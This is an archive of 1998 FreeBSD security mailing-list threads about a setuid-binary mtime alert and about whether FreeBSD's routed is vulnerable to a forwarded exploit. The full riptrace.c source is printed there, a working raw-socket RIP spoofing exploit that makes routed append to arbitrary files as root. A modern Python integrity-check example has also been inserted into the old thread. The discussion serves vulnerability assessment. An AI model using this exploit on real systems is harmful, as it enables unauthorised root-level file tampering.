From owner-freebsd-security Tue Jan 6 17:15:53 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id RAA15625 for security-outgoing; Tue, 6 Jan 1998 17:15:53 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from rainey.blueneptune.com (root@rainey.blueneptune.com [207.104.147.238]) by hub.freebsd.org (8.8.7/8.8.7) with SMTP id RAA15619 for ; Tue, 6 Jan 1998 17:15:51 -0800 (PST) (envelope-from michael@blueneptune.com)
From: michael@blueneptune.com
Received: (from michael@localhost) by rainey.blueneptune.com (8.6.12/8.6.12) id RAA01292 for freebsd-security@freebsd.org; Tue, 6 Jan 1998 17:15:38 -0800
Message-Id: <199801070115.RAA01292@rainey.blueneptune.com>
Subject: Long delay on digest version of the list
To: freebsd-security@freebsd.org
Date: Tue, 6 Jan 1998 17:15:37 -0800 (PST)
Reply-To: michael@blueneptune.com
X-Mailer: ELM [version 2.4 PL24 ME8b]
Content-Type: text
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In an effort to minimize the number of mail messages I get, I tend to subscribe to the digest version of mailing lists, when possible. However, the digest version of this list (freebsd-security) appears to be configured to kick off only when a certain byte-count threshold has been crossed. This is unlike most digested lists I subscribe to, which will also send off a digest every 24 or 48 hours, even though the size threshold has not been reached. During periods of light activity, it can be several days or even weeks between digests, which seems to be counter-productive for a list dealing with security issues.

Can we get the digest running on a more timely basis, please? It seems like every 24 hours would be a reasonable interval for the digest. This is very easy to do with Majordomo, just an entry or two in the appropriate crontab will do it.

[Yes, I know I can just switch to the non-digest version, but there have been brief periods with high activity, and it was one of those that caused me to decide to switch to the digest version anyway. I think it just makes sense for this particular digest to be sent out in a timely fashion, given the topic of discussion.]

--
Michael Bryan
michael@blueneptune.com

From owner-freebsd-security Thu Jan 8 06:31:50 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id GAA19327 for security-outgoing; Thu, 8 Jan 1998 06:31:50 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from hammurabi.nh.ultra.net (hammurabi.nh.ultra.net [205.162.79.24]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id GAA19320 for ; Thu, 8 Jan 1998 06:31:45 -0800 (PST) (envelope-from lhartfor@mtghouse.com)
Received: from lucy.portsmouth (paulg.nh.ultranet.com [207.41.158.58]) by hammurabi.nh.ultra.net (8.8.5/ult.n14767) with SMTP id JAA11622 for ; Thu, 8 Jan 1998 09:31:47 -0500 (EST)
Received: (qmail 11191 invoked from network); 8 Jan 1998 14:32:50 -0000
Received: from unknown (HELO larry) (192.32.47.65) by 192.32.47.84 with SMTP; 8 Jan 1998 14:32:50 -0000
Date: Thu, 8 Jan 1998 09:40:30 -0500 (EST)
From: Lance Hartford
X-Sender: lhartfor@larry
Reply-To: Lance Hartford
To: freebsd-security@freebsd.org
Subject: /usr/bin/su modification time changing
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I just installed 2.2.5 on a PC and I received the following portion of message in a security mail that was sent out last night:

xyz setuid diffs:
152c152
< -r-sr-xr-x 1 root bin 16384 Oct 21 10:19:25 1997 /usr/bin/su
---
> -r-sr-xr-x 1 root bin 16384 Jan 7 19:40:28 1998 /usr/bin/su

I did a "sum" on the /usr/bin/su on another system onsite, and found that there was no difference compared to the one on this system.
Does this imply that there is a security problem at my site?

Thanks.

Lance

From owner-freebsd-security Thu Jan 8 08:46:26 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id IAA01317 for security-outgoing; Thu, 8 Jan 1998 08:46:26 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from mailbox.nosc.mil (mailbox.nosc.mil [198.253.34.39]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id IAA01310 for ; Thu, 8 Jan 1998 08:46:23 -0800 (PST) (envelope-from swann@nosc.mil)
Received: from localhost (swann@localhost) by mailbox.nosc.mil (8.8.3/8.8.3) with SMTP id LAA01918; Thu, 8 Jan 1998 11:45:47 -0500 (EST)
X-Authentication-Warning: mailbox.nosc.mil: swann owned process doing -bs
Date: Thu, 8 Jan 1998 11:45:47 -0500 (EST)
From: Bryan Swann
X-Sender: swann@mailbox
To: Lance Hartford
cc: freebsd-security@freebsd.org
Subject: Re: /usr/bin/su modification time changing
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I believe there are three different times associated with each file, creation time, last access time, last modification time. I assume your message came from tripwire or a similar tool. You can use options to the ls command to determine which of the times have changed. You may find that you need to alter the 'time' your security check monitors for.

Best of luck.

__________________________________________________________________________
| Bryan Swann (swann@nosc.mil)          803/974-4267  803/974-5080 (Fax) |
| Eagan McAllister Associates, Inc.                                      |
|                                                                        |
| "Everything must be working perfectly, cause I don't smell any smoke"  |
--------------------------------------------------------------------------

On Thu, 8 Jan 1998, Lance Hartford wrote:

>
> I just installed 2.2.5 on a PC and I received the following portion of
> message in a security mail that was sent out last night:
>
> xyz setuid diffs:
> 152c152
> < -r-sr-xr-x 1 root bin 16384 Oct 21 10:19:25 1997 /usr/bin/su
> ---
> > -r-sr-xr-x 1 root bin 16384 Jan 7 19:40:28 1998 /usr/bin/su
>
> I did a "sum" on the /usr/bin/su on another system onsite, and found
> that there was no difference compared to the one on this system. Does
> this imply that there is a security problem at my site?
>
> Thanks.
>
> Lance
>
>

From owner-freebsd-security Thu Jan 8 09:35:29 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id JAA05753 for security-outgoing; Thu, 8 Jan 1998 09:35:29 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id JAA05722 for ; Thu, 8 Jan 1998 09:35:13 -0800 (PST) (envelope-from adam@homeport.org)
Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id MAA09060; Thu, 8 Jan 1998 12:32:36 -0500 (EST)
From: Adam Shostack
Message-Id: <199801081732.MAA09060@homeport.org>
Subject: Re: /usr/bin/su modification time changing
In-Reply-To: from Lance Hartford at "Jan 8, 98 09:40:30 am"
To: lhartfor@mtghouse.com
Date: Thu, 8 Jan 1998 12:32:35 -0500 (EST)
Cc: freebsd-security@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL27 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Suggest using md5, not sum. Script kiddies have had tools since 1990 or so to fake out sum.

diff is also useful. :)

Also, I seem to recall that there's a problem with FreeBSD where the OS randomly updates the mod time, but nothing else, of a file.

Adam

Lance Hartford wrote:
|
| I just installed 2.2.5 on a PC and I received the following portion of
| message in a security mail that was sent out last night:
|
| xyz setuid diffs:
| 152c152
| < -r-sr-xr-x 1 root bin 16384 Oct 21 10:19:25 1997 /usr/bin/su
| ---
| > -r-sr-xr-x 1 root bin 16384 Jan 7 19:40:28 1998 /usr/bin/su
|
| I did a "sum" on the /usr/bin/su on another system onsite, and found
| that there was no difference compared to the one on this system. Does
| this imply that there is a security problem at my site?
|
| Thanks.
|
| Lance
|

--
<123> stargate /export/home/adam% passwd
passwd: Changing password for adam
passwd: adam does not exist

From owner-freebsd-security Thu Jan 8 10:26:39 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id KAA11360 for security-outgoing; Thu, 8 Jan 1998 10:26:39 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from megaweapon.zigg.com (tcgr-64.dialup.alliance.net [207.74.43.64]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id KAA11336 for ; Thu, 8 Jan 1998 10:26:33 -0800 (PST) (envelope-from matt@megaweapon.zigg.com)
Received: from varda.local (varda.local [192.168.0.2]) by megaweapon.zigg.com (8.8.8/8.8.7) with ESMTP id NAA23334; Thu, 8 Jan 1998 13:26:17 -0500 (EST) (envelope-from matt@megaweapon.zigg.com)
Received: from localhost (matt@localhost) by varda.local (8.8.8/8.8.7) with SMTP id NAA00267; Thu, 8 Jan 1998 13:25:50 -0500 (EST) (envelope-from matt@megaweapon.zigg.com)
X-Authentication-Warning: varda.local: matt owned process doing -bs
Date: Thu, 8 Jan 1998 13:25:50 -0500 (EST)
From: Matt Behrens
X-Sender: matt@varda.local
To: Bryan Swann
cc: Lance Hartford, freebsd-security@freebsd.org
Subject: Re: /usr/bin/su modification time changing
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Thu, 8 Jan 1998, Bryan Swann wrote:

> I believe there are three different times associated with each file,
> creation time, last access time, last modification time. I assume your
> message came from tripwire or a similar tool. You can use options to the
> ls command to determine which of the times have changed. You may find
> that you need to alter the 'time' your security check monitors for.

Lance's message came from the nightly setuid diff check, which comes standard on all versions of FreeBSD I've used, at least. He should probably check into it, someone might be toying with it. (Alternatively, a make world might have updated it...)

Matt Behrens         | Support the anti-spam amendment!
http://www.zigg.com/ | Visit http://www.cauce.org/

From owner-freebsd-security Thu Jan 8 12:30:47 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id MAA25965 for security-outgoing; Thu, 8 Jan 1998 12:30:47 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id MAA25957 for ; Thu, 8 Jan 1998 12:30:37 -0800 (PST) (envelope-from cschuber@passer.osg.gov.bc.ca)
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id MAA18652; Thu, 8 Jan 1998 12:29:11 -0800 (PST)
Message-Id: <199801082029.MAA18652@passer.osg.gov.bc.ca>
Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaatkCa; Thu Jan 8 12:29:04 1998
X-Mailer: exmh version 2.0gamma 1/27/96
Reply-to: Cy Schubert - ITSD Open Systems Group
X-Sender: cschuber
To: Adam Shostack
cc: lhartfor@mtghouse.com, freebsd-security@freebsd.org
Subject: Re: /usr/bin/su modification time changing
In-reply-to: Your message of "Thu, 08 Jan 1998 12:32:35 EST." <199801081732.MAA09060@homeport.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 08 Jan 1998 12:28:54 -0800
From: Cy Schubert - ITSD Open Systems Group
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Suggest using md5, not sum. Script kiddies have had tools since 1990
> or so to fake out sum.
>
> diff is also useful. :)
>
> Also, I seem to recall that there's a problem with FreeBSD where the OS
> randomly updates the mod time, but nothing else, of a file.

The modification time of a file can be changed if breakpoints are set during a gdb session, if a file gets paged out and in some circumstances when mmap() is used. The problem can be reproduced on 2.2.x systems 100% of the time when restore is run. Restore's mod time always gets updated whenever it is run. The problem was more prevalent in 2.0 and 2.1. I understand that fixes to VM and procfs in -current may have fixed this.

>
>
> Adam
>
>
> Lance Hartford wrote:
> |
> | I just installed 2.2.5 on a PC and I received the following portion of
> | message in a security mail that was sent out last night:
> |
> | xyz setuid diffs:
> | 152c152
> | < -r-sr-xr-x 1 root bin 16384 Oct 21 10:19:25 1997 /usr/bin/su
> | ---
> | > -r-sr-xr-x 1 root bin 16384 Jan 7 19:40:28 1998 /usr/bin/su
> |
> | I did a "sum" on the /usr/bin/su on another system onsite, and found
> | that there was no difference compared to the one on this system. Does
> | this imply that there is a security problem at my site?
> |
> | Thanks.
> |
> | Lance
> |
>
>
> --
> <123> stargate /export/home/adam% passwd
> passwd: Changing password for adam
> passwd: adam does not exist

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
UNIX Support                   OV/VM:  BCSC02(CSCHUBER)
ITSD                           BITNET: CSCHUBER@BCSC02.BITNET
Government of BC               Internet: cschuber@uumail.gov.bc.ca
                                         Cy.Schubert@gems8.gov.bc.ca

"Quit spooling around, JES do it."
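The check this thread keeps circling back to, written out as an added example (it is not FreeBSD's /etc/security script and not anyone's code from the thread): record mode, owner, size, mtime and a strong digest for every setuid/setgid binary, then on comparison separate an mtime-only change, the 2.x quirk Cy describes, from a real content or ownership change, which a size/mtime diff alone cannot do. SHA-256 stands in for the md5 the thread recommends over sum; the baseline and current records are constructed to mirror the /usr/bin/su lines Lance posted, with made-up digests and epoch values.

```python
"""Setuid-binary integrity check that tells an mtime-only change apart from
a content or ownership change (added example, not FreeBSD's own script)."""
import hashlib
import os
import stat
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Record:
    mode: int     # st_mode, including the setuid/setgid bits
    uid: int
    gid: int
    size: int
    mtime: int    # seconds since the epoch
    digest: str   # hex SHA-256 of the contents (strong digest, not sum(1))


def digest_file(path: str) -> str:
    """Hash the file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root: str) -> Dict[str, Record]:
    """Record every regular file under root with the setuid or setgid bit set."""
    found: Dict[str, Record] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable: skip it rather than abort the run
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            found[path] = Record(st.st_mode, st.st_uid, st.st_gid, st.st_size,
                                 int(st.st_mtime), digest_file(path))
    return found


Finding = Tuple[str, str, str]  # (severity, path, reason)


def compare(baseline: Dict[str, Record], current: Dict[str, Record]) -> List[Finding]:
    """Classify differences between two scans.

    Content, mode or ownership changes are ALERTs. A new mtime with an identical
    digest is INFO only: that is the /usr/bin/su case in the thread, and the
    distinction an ls-style size/mtime diff cannot make on its own."""
    findings: List[Finding] = []
    for path in sorted(set(baseline) | set(current)):
        old, new = baseline.get(path), current.get(path)
        if old is None:
            findings.append(("ALERT", path, "new setuid/setgid file"))
        elif new is None:
            findings.append(("NOTICE", path, "setuid/setgid file missing or bit cleared"))
        elif old.digest != new.digest:
            findings.append(("ALERT", path, "contents changed (digest differs)"))
        elif (old.mode, old.uid, old.gid) != (new.mode, new.uid, new.gid):
            findings.append(("ALERT", path, "mode or ownership changed"))
        elif old.mtime != new.mtime:
            findings.append(("INFO", path, "mtime changed, contents identical"))
    return findings


# Constructed sample records mirroring the thread: su (-r-sr-xr-x root:bin,
# 16384 bytes) gets a new mtime but keeps its digest; passwd really changes.
# Digests and epoch values are made up for the example.
SU_MODE = stat.S_IFREG | stat.S_ISUID | 0o555  # -r-sr-xr-x
BASELINE = {
    "/usr/bin/su": Record(SU_MODE, 0, 7, 16384, 877_429_165, "a" * 64),    # Oct 21 1997
    "/usr/bin/passwd": Record(SU_MODE, 0, 7, 20480, 877_429_165, "b" * 64),
}
CURRENT = {
    "/usr/bin/su": Record(SU_MODE, 0, 7, 16384, 884_202_028, "a" * 64),    # Jan 7 1998
    "/usr/bin/passwd": Record(SU_MODE, 0, 7, 20480, 884_202_028, "c" * 64),
}


def demo() -> List[Finding]:
    """Compare the constructed records; a real run would compare against scan('/usr')."""
    return compare(BASELINE, CURRENT)


if __name__ == "__main__":
    for severity, path, reason in demo():
        print(f"{severity:6} {path}: {reason}")
```

Keep the baseline on read-only media, as Mike Smith suggests below for the reference copy, since a baseline stored on the monitored host can be edited along with the binary.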
From owner-freebsd-security Thu Jan 8 14:53:47 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id OAA12885 for security-outgoing; Thu, 8 Jan 1998 14:53:47 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from word.smith.net.au (ppp8.portal.net.au [202.12.71.108]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id OAA12873 for ; Thu, 8 Jan 1998 14:53:35 -0800 (PST) (envelope-from mike@word.smith.net.au)
Received: from word (localhost [127.0.0.1]) by word.smith.net.au (8.8.8/8.8.5) with ESMTP id JAA01042; Fri, 9 Jan 1998 09:17:12 +1030 (CST)
Message-Id: <199801082247.JAA01042@word.smith.net.au>
X-Mailer: exmh version 2.0zeta 7/24/97
To: Lance Hartford
cc: freebsd-security@freebsd.org
Subject: Re: /usr/bin/su modification time changing
In-reply-to: Your message of "Thu, 08 Jan 1998 09:40:30 CDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 09 Jan 1998 09:17:11 +1030
From: Mike Smith
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>
> I just installed 2.2.5 on a PC and I received the following portion of
> message in a security mail that was sent out last night:
>
> xyz setuid diffs:
> 152c152
> < -r-sr-xr-x 1 root bin 16384 Oct 21 10:19:25 1997 /usr/bin/su
> ---
> > -r-sr-xr-x 1 root bin 16384 Jan 7 19:40:28 1998 /usr/bin/su
>
> I did a "sum" on the /usr/bin/su on another system onsite, and found
> that there was no difference compared to the one on this system. Does
> this imply that there is a security problem at my site?

This is a known quirk in 2.x systems. If you are concerned about this sort of thing (ie. you have shell accounts on your system), you might want to look at a tool that uses stronger checksumming (esp. MD5) for verification.

Also, you would be *much* better off using the "Live Filesystem" CD for reference rather than another system, as both may have been compromised.

--
\\ Sometimes you're ahead,       \\ Mike Smith
\\ sometimes you're behind.      \\ mike@smith.net.au
\\ The race is long, and in the  \\ msmith@freebsd.org
\\ end it's only with yourself.  \\

From owner-freebsd-security Thu Jan 8 14:55:00 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id OAA13015 for security-outgoing; Thu, 8 Jan 1998 14:55:00 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from mx1.cso.uiuc.edu (mx1.cso.uiuc.edu [128.174.5.37]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id OAA12990 for ; Thu, 8 Jan 1998 14:54:52 -0800 (PST) (envelope-from igor@alecto.physics.uiuc.edu)
Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by mx1.cso.uiuc.edu (8.8.8/8.8.8) with SMTP id QAA23420 for <@mailhost.uiuc.edu:security@freebsd.org>; Thu, 8 Jan 1998 16:54:19 -0600 (CST)
Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) for security@freebsd.org id QAA14645; Thu, 8 Jan 1998 16:51:45 -0600
From: igor@alecto.physics.uiuc.edu (Igor Roshchin)
Message-Id: <199801082251.QAA14645@alecto.physics.uiuc.edu>
Subject: riptrace.c (fwd)
To: security@freebsd.org
Date: Thu, 8 Jan 1998 16:51:45 -0600 (CST)
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I probably should have tested it myself, but don't have possibility at the moment.
So, the question is:
Is FreeBSD vulnerable to this or to a modified exploit?

Thanks,

IgoR

Forwarded message:
From owner-bugtraq@NETSPACE.ORG Thu Jan 8 16:33:44 1998
Approved-By: aleph1@UNDERGROUND.ORG
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY=------------52EC4E226C19
Content-Id:
Message-ID:
Date: Thu, 8 Jan 1998 15:19:03 -0600
Reply-To: Aleph One
Sender: Bugtraq List
From: Aleph One
Subject: riptrace.c
To: BUGTRAQ@NETSPACE.ORG
More goodies from rootshell.com.

http://www.rootshell.com/archive-Rbf4ahcmxzw5qn2S/199801/riptrace.c

/*
 * BSD 4.4 based routed trace file exploit
 *
 * (C) 1997 Rootshell [ http://www.rootshell.com/ ]
 *
 *
 *
 * routed has the ability for a packet to be sent to the daemon that will
 * turn on debug mode. The packet is able to specify the file which is
 * later opened without any checks being placed on that file open.
 *
 * Result: You can append to any file on the filesystem.
 *
 * The following syscall is made AS ROOT.
 *
 *   ftrace = fopen(file, "a");
 *
 * This is obviously a LARGE problem.
 *
 * Solaris 2.6 seems to ignore these packets and returns the following
 * error. Mileage may vary.. :
 *
 *   in.routed[6580]: trace command from 1.2.3.4 - ignored
 *
 * Redhat routed was tested and found to check if the packet came from
 * a valid router. If you spoof the RIP packet from their default
 * gateway the packet is ACCEPTED.
 *
 * Note: Once a trace file is opened you must close the trace file and then
 * open another file.
 *
 * Exploit tested under Linux 2.0.x.
 *
 * ps. Just run gated! (http://www.gated.org/)
 *
 */

/* File to append to on filesystem with debug output */
#define FILETOCREATE "/tmp/rootshell"

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

/*
 * in_cksum --
 *      Checksum routine for Internet Protocol family headers (C Version)
 */
unsigned short
in_cksum(addr, len)
    u_short *addr;
    int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
    }

    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
    sum += (sum >> 16);                     /* add carry */
    answer = ~sum;                          /* truncate to 16 bits */
    return(answer);
}

/* Send faked UDP packet. */
int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport)
    struct sockaddr_in *sin;
    unsigned short int s, datalen, sport, dport;
    unsigned long int saddr, daddr;
    char *data;
{
    struct iphdr ip;
    struct udphdr udp;
    static char packet[8192];

    /* Fill in IP header values. */
    ip.ihl = 5;
    ip.version = 4;
    ip.tos = 0;
    ip.tot_len = htons(28 + datalen);
    ip.id = htons(31337 + (rand()%100));
    ip.frag_off = 0;
    ip.ttl = 255;
    ip.protocol = IPPROTO_UDP;
    ip.check = 0;
    ip.saddr = saddr;
    ip.daddr = daddr;
    ip.check = in_cksum((char *)&ip, sizeof(ip));

    /* Fill in UDP header values. Checksums are unnecessary. */
    udp.source = htons(sport);
    udp.dest = htons(dport);
    udp.len = htons(8 + datalen);
    udp.check = (short) 0;

    /* Copy the headers into our character array. */
    memcpy(packet, (char *)&ip, sizeof(ip));
    memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp));
    memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen);

    return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0,
                  (struct sockaddr *)sin, sizeof(struct sockaddr_in)));
}

/* Lookup the name. Also handles a.b.c.d dotted quads.
   Returns 0 on error */
unsigned int lookup(host)
    char *host;
{
    unsigned int addr;
    struct hostent *he;

    addr = inet_addr(host);       /* Try if it's a "127.0.0.1" style string */
    if (addr == -1)               /* If not, lookup the host */
    {
        he = gethostbyname(host);
        if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
            return 0;
        bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list));
    }
    return(addr);
}

void main(argc, argv)
    int argc;
    char **argv;
{
    unsigned int saddr, daddr;
    struct sockaddr_in sin;
    int s;
    struct rip rp;

    if(argc != 4)
        errs("\nSee http://www.rootshell.com/\n\nUsage: %s \n\ncommand: 3 = trace on, 4 = trace off\n\n",argv[0]);

    if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
        err("Unable to open raw socket.\n");
    if(!(saddr = lookup(argv[1])))
        err("Unable to lookup source address.\n");
    if(!(daddr = lookup(argv[2])))
        err("Unable to lookup destination address.\n");

    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr= daddr;
    sin.sin_port = 520;

    /* Fill in RIP packet info */
    rp.rip_cmd = atoi(argv[3]);    /* 3 = RIPCMD_TRACEON, 4 = RIPCMD_TRACEOFF */
    rp.rip_vers = RIPVERSION;      /* Must be version 1 */
    sprintf(rp.rip_tracefile, FILETOCREATE);

    if((sendpkt_udp(&sin, s, &rp, sizeof(rp), saddr, daddr, 520, 520)) == -1)
    {
        perror("sendpkt_udp");
        err("Error sending the UDP packet.\n");
    }
}

From owner-freebsd-security Thu Jan 8 15:05:43 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id PAA14072 for security-outgoing; Thu, 8 Jan 1998 15:05:43 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from panda.hilink.com.au (panda.hilink.com.au [203.8.15.25]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id PAA13708 for ; Thu, 8 Jan 1998 15:02:52 -0800 (PST) (envelope-from danny@panda.hilink.com.au)
Received: (from danny@localhost) by panda.hilink.com.au (8.8.5/8.8.5) id KAA08517; Fri, 9 Jan 1998 10:02:11 +1100 (EST)
Date: Fri, 9 Jan 1998 10:02:11 +1100 (EST)
From: "Daniel O'Callaghan"
To: freebsd-security@freebsd.org
Subject: riptrace.c
Message-ID:
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY=------------52EC4E226C19
Content-ID:
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

From a brief look at the srcs, FreeBSD seems to be vulnerable.

Danny

---------- Forwarded message ----------
Date: Thu, 8 Jan 1998 15:19:03 -0600
From: Aleph One
To: BUGTRAQ@NETSPACE.ORG
Subject: riptrace.c

More goodies from rootshell.com.

http://www.rootshell.com/archive-Rbf4ahcmxzw5qn2S/199801/riptrace.c

[riptrace.c as forwarded above by Igor Roshchin; the forwarded copy is identical and is not repeated here.]

From owner-freebsd-security Fri Jan 9 08:20:05 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id IAA14871 for security-outgoing; Fri, 9 Jan 1998 08:20:05 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org
(8.8.7/8.8.7) with ESMTP id IAA14811 for ; Fri, 9 Jan 1998 08:19:56 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.8/8.8.5) id LAA08275; Fri, 9 Jan 1998 11:19:48 -0500 (EST)
Date: Fri, 9 Jan 1998 11:19:48 -0500 (EST)
From: Garrett Wollman
Message-Id: <199801091619.LAA08275@khavrinen.lcs.mit.edu>
To: igor@alecto.physics.uiuc.edu (Igor Roshchin)
Cc: security@FreeBSD.ORG
Subject: riptrace.c (fwd)
In-Reply-To: <199801082251.QAA14645@alecto.physics.uiuc.edu>
References: <199801082251.QAA14645@alecto.physics.uiuc.edu>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

<
> I probably should have tested it myself,
> but don't have possibility at the moment.
> So, the question is:
> Is FreeBSD vulnerable to this or to a modified exploit?

No. FreeBSD's routed will only permit remote control of tracing under the following conditions:

1) A trace file was specified on the routed command line.
2) The requested trace file is the same as the one specified in (1).

See routed/trace.c for details.

-GAWollman

--
Garrett A. Wollman   | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu  | O Siem / The fires of freedom
Opinions not those of| Dance in the burning flame
MIT, LCS, CRS, or NSA|                     - Susan Aglukark and Chad Irschick

From owner-freebsd-security Sat Jan 10 19:27:54 1998
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id TAA02867 for security-outgoing; Sat, 10 Jan 1998 19:27:54 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from gvr.gvr.org (root@gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id TAA02822 for ; Sat, 10 Jan 1998 19:27:37 -0800 (PST) (envelope-from guido@gvr.org)
Received: (from guido@localhost) by gvr.gvr.org (8.8.6/8.8.5) id XAA21563; Sat, 10 Jan 1998 23:11:45 +0100 (MET)
From: Guido van Rooij
Message-Id: <199801102211.XAA21563@gvr.gvr.org>
Subject: Re: riptrace.c (fwd)
In-Reply-To: <199801091619.LAA08275@khavrinen.lcs.mit.edu> from Garrett Wollman at "Jan 9, 98 11:19:48 am"
To: wollman@khavrinen.lcs.mit.edu (Garrett Wollman)
Date: Sat, 10 Jan 1998 23:11:44 +0100 (MET)
Cc: igor@alecto.physics.uiuc.edu, security@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL32 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Garrett Wollman wrote:
> <
> > I probably should have tested it myself,
> > but don't have possibility at the moment.
> > So, the question is:
> > Is FreeBSD vulnerable to this or to a modified exploit?
>
> No. FreeBSD's routed will only permit remote control of tracing under
> the following conditions:
>
> 1) A trace file was specified on the routed command line.
> 2) The requested trace file is the same as the one specified in (1).
>
> See routed/trace.c for details.

More correctly: FreeBSD versions 2.2.* are not vulnerable. 2.1.* and earlier are vulnerable.

-Guido